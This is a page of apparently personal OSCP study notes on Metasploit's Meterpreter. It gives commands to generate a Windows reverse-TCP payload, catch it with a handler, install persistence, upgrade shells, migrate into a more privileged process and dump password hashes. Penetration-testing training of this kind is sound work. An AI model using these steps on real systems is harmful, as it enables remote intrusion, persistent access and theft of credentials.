Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  • windows persistance module
  • upgrading a system shell to meterpreter shell
  • migrate from to another process ID with better permissions
  • dump all the hashes
  1. Menu
  2. Tools of the Trade

meterpreter

windows persistance module

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe

  2. transfer shell.exe to victim

  3. msfconsole

  4. use exploit/multi/handler

  5. set payload windows/meterpreter/reverse_tcp

  6. set LHOST and LPORT

  7. run

  8. background

  9. use exploit/windows/local/persistence

  10. set session 1

  11. run

Now if the shell drops for any reason you can catch it again by use exploit/multi/handler

upgrading a system shell to meterpreter shell

while on the regular system shell through meterpreter do ctrl+z to background it.

type sessions -u 1 which will upgrade the shell. then get back to the upgraded shell with sessions 2

migrate from to another process ID with better permissions

ps to view all the commands and who is running them

migrate $PID of the process permissions you want to use

dump all the hashes

hashdump

PreviousmiscNextBloodhound

Last updated 3 years ago